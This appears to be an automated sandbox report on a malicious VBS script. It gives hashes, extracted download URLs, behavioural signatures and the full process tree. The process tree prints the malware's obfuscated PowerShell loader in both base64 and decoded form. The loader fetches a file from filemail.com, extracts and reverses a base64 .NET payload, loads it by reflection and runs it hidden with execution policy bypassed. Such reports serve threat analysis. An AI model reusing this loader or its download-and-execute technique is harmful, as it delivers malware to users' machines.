Analysis
-
max time kernel
14s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
07-11-2024 15:52
Static task
static1
Behavioral task
behavioral1
Sample
dfcugh.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
dfcugh.vbs
Resource
win10v2004-20241007-en
General
-
Target
dfcugh.vbs
-
Size
13KB
-
MD5
4f3e6d1619f31390de9a461391f10dba
-
SHA1
9d90fa6b3bb7809fc800751c6cfc41dc68742a84
-
SHA256
2202962f09e94846b9677dda2358f0f04871bcd02c6ac3c5f3f27e85982d26c6
-
SHA512
f609e24d91a9ee08fe9b89f4909eb8745045d67b0b20d187d4586f5c382cefc2af96baacd1125aef96b71cc4eeeefdf0baa4467a1bb66637edfedacca9615427
-
SSDEEP
384:CiQvc9iQZ4T6+wi7Ahrd5RxEA/mywQfD6U512ChMsB+5wZ/f3CPR:CiQk9iQzn512ChMsB+4/fyPR
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exepowershell.exeflow pid Process 3 2220 WScript.exe 4 2220 WScript.exe 6 2168 powershell.exe 7 2168 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 2168 powershell.exe 2952 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2952 powershell.exe 2168 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.exeWScript.exepowershell.exedescription pid Process procid_target PID 2820 wrote to memory of 2220 2820 WScript.exe 30 PID 2820 wrote to memory of 2220 2820 WScript.exe 30 PID 2820 wrote to memory of 2220 2820 WScript.exe 30 PID 2220 wrote to memory of 2952 2220 WScript.exe 31 PID 2220 wrote to memory of 2952 2220 WScript.exe 31 PID 2220 wrote to memory of 2952 2220 WScript.exe 31 PID 2952 wrote to memory of 2168 2952 powershell.exe 33 PID 2952 wrote to memory of 2168 2952 powershell.exe 33 PID 2952 wrote to memory of 2168 2952 powershell.exe 33
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfcugh.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RLlBJGBXJiGLuhwiJI.js"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAHAAcwBoAG8AbQBlAFsANABdACsAJABwAHMAaABPAE0ARQBbADMANABdACsAJwB4ACcAKQAoACAAKAAnAEwAeABGAGkAbQBhAGcAJwArACcAZQBVAHIAbAAgAD0AIABEAFgAdgBoAHQAdABwACcAKwAnAHMAOgAvAC8AMQAwADEANwAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAJwArACcAPwBmAGkAbABlAGsAZQB5AD0AMgBBAGEAXwBiAFcAbwA5AFIAZQB1ADQANQB0ADcAQgBVADEAawBWAGcAcwBkADkAcABUADkAcABnAFMAUwBsAHYAUwB0AEcAcgBuAFQASQBDAGYARgBoAG0AVABLAGoAMwBMAEMANgBTAFEAdABJAGMATwBjAF8AVAAzADUAJwArACcAdwAmAHAAawBfAHYAaQBkAD0AZgBkADQAZgA2ADEAJwArACcANAAnACsAJwBiAGIAMgAwADkAYwA2ADIAYwAxADcAMwAwADkANAA1ADEANwA2AGEAMAA5ADAANABmACAARABYAHYAOwBMAHgARgB3AGUAYgAnACsAJwBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsATAB4AEYAaQBtAGEAZwBlAEIAJwArACcAeQB0AGUAcwAgAD0AIABMAHgARgB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgATAB4AEYAaQBtAGEAZwBlAFUAcgBsACkAOwAnACsAJwBMACcAKwAnAHgARgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjACcAKwAnAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQAnACsAJwBuAGcAKABMAHgARgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBMAHgARgBzAHQAYQByAHQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AEQAWAB2ADsATAB4AEYAZQAnACsAJwBuAGQARgBsAGEAZwAgAD0AIABEAFgAdgA8ADwAQgBBAFMARQA2ADQAXwBFACcAKwAnAE4ARAA+AD4ARABYAHYAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAEwAeAAnACsAJwBGAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEwAeABGAHMAdABhAHIAdABGAGwAYQBnACkAOwBMAHgARgBlAG4AZABJAG4AZABlAHgAIAA9ACAATAB4AEYAaQBtAGEAJwArACcAZwBlAFQAZQB4ACcAKwAnAHQALgBJAG4AZABlAHgATwBmACgATAB4AEYAZQBuAGQARgBsAGEAZwApADsATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABMAHgARgBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAEwAeABGAHMAdABhAHIAdABJAG4AZABlAHgAOwBMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJwArACcATAB4AEYAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AEwAeABGAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAEwAeABGAGUAbgBkAEkAbgBkAGUAeAAgAC0AIABMAHgARgBzAHQAYQByAHQASQBuAGQAZQB4ADsATAB4AEYAYgBhACcAKwAnAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABMAHgARgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgATAB4AEYAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAATAB4AEYAYgBhAHMAZQA2ADQATABlAG4AZwB0ACcAKwAnAGgAKQA7AEwAeABGAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBUAG8AQwBoAGEAcgAnACsAJwBBAHIAcgBhAHkAKAApACAAOABiAEMAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAATAB4AEYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAEwAeABGAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApACcAKwAnAF0AOwBMAHgARgBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgATAB4AEYAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACkAJwArACcAOwBMAHgARgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEwAeABGAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwBMAHgARgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAnACsAJwAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgARABYAHYAVgBBAEkARABYAHYAKQA7AEwAeABGAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABMAHgARgBuAHUAbABsACwAIABAACgARAAnACsAJwBYAHYAdAB4AHQALgBkAHMAdABlAHAALwBwAG8AcAAvAHUAZQAuAHAAcgBnAHgAYQBtAHkAZwByAGUAbgBlAC4AZwBpAGcALwAvADoAcAB0AHQAaABEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsACAARABYAHYAMQBEAFgAdgAsACAARABYAHYAZAB4AGQAaQBhAGcARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwAIABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAZABlAHMAYQB0AGkAdgBhAGQAbwBEAFgAdgAsAEQAWAB2AGQAJwArACcAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYALABEAFgAdgBkAGUAcwBhAHQAaQB2AGEAZABvAEQAWAB2ACwARABYAHYAMQBEAFgAdgAsAEQAWAB2AGQAZQBzAGEAdABpAHYAYQBkAG8ARABYAHYAKQApADsAJwApAC4AcgBlAFAAbABBAEMARQAoACcAOABiAEMAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAxADIANAApAC4AcgBlAFAAbABBAEMARQAoACcATAB4AEYAJwAsAFsAcwB0AFIASQBOAEcAXQBbAEMASABhAFIAXQAzADYAKQAuAHIAZQBQAGwAQQBDAEUAKAAnAEQAWAB2ACcALABbAHMAdABSAEkATgBHAF0AWwBDAEgAYQBSAF0AMwA5ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $pshome[4]+$pshOME[34]+'x')( ('LxFimag'+'eUrl = DXvhttp'+'s://1017.filemail.com/api/file/get'+'?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f61'+'4'+'bb209c62c1730945176a0904f DXv;LxFweb'+'Client = New-Object System.Net.WebClient;LxFimageB'+'ytes = LxFwebClien'+'t.DownloadData(LxFimageUrl);'+'L'+'xFimageText = [System.Text.Enc'+'oding]::UTF8.GetStri'+'ng(LxFimageBytes);LxFstartFlag = DXv<<BASE64_START>>DXv;LxFe'+'ndFlag = DXv<<BASE64_E'+'ND>>DXv;LxFstartIndex = Lx'+'FimageText.IndexOf(LxFstartFlag);LxFendIndex = LxFima'+'geTex'+'t.IndexOf(LxFendFlag);LxFstartIndex -ge 0 -and LxFendIndex -gt LxFstartIndex;LxFstartIndex += '+'LxFstartFlag.Length;LxFbase64Length = LxFendIndex - LxFstartIndex;LxFba'+'se64Command = LxFimageText.Substring(LxFstartIndex, LxFbase64Lengt'+'h);LxFbase64Reversed = -join (LxFbase64Command.ToChar'+'Array() 8bC ForEach-Object { LxF_ })[-1..-(LxFbase64Command.Length)'+'];LxFcommandBytes = [System.Convert]::FromBase64String(LxFbase64Reversed)'+';LxFloadedAssembly = [System.Reflection.Assembly]::Load(LxFcommandBytes);LxFvaiMethod = [dnlib'+'.IO.Home].GetMethod(DXvVAIDXv);LxFvaiMethod.Invoke(LxFnull, @(D'+'Xvtxt.dstep/pop/ue.prgxamygrene.gig//:ptthDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXvdesativadoDXv, DXv1DXv, DXvdxdiagDXv,DXvdesativadoDXv, DXvdesativadoDXv,DXvdesativadoDXv,DXvd'+'esativadoDXv,DXvdesativadoDXv,DXv1DXv,DXvdesativadoDXv));').rePlACE('8bC',[stRING][CHaR]124).rePlACE('LxF',[stRING][CHaR]36).rePlACE('DXv',[stRING][CHaR]39))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53d68e0db63d092d83baf5f2e61a2240c
SHA154bec790443c5eceea3819b516714d8d73588684
SHA256718f980994f02da3640c8618398ac88a4c3bfb7df0dd9ba118af2f5ef305819a
SHA512115f21a1066286b28855a3ddf9aa2d3f37525bbc9da5807755a8b5b5111bd4e1af539388f8ab69dea37c0ac36096fbe837bad4a52939bc31847bc2583a2841cf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5279251588d1506453bc89a67fa008a29
SHA1ea79e3bbb3a8cf2f0f9982c93e8ed75eafa95c9b
SHA256998d87d34c57c22aa5f8995138b5230bfad2ff58eaebc1c96e4c930bbac61644
SHA512342f3bfdfb3fe94d29f8232f9de9f832a4df547e78dd341209f001a7dd25d322ce4ac1600ab738cfe62c3a086a413e7e0b8b2ec19ca5a8a23f6853abdca2de0a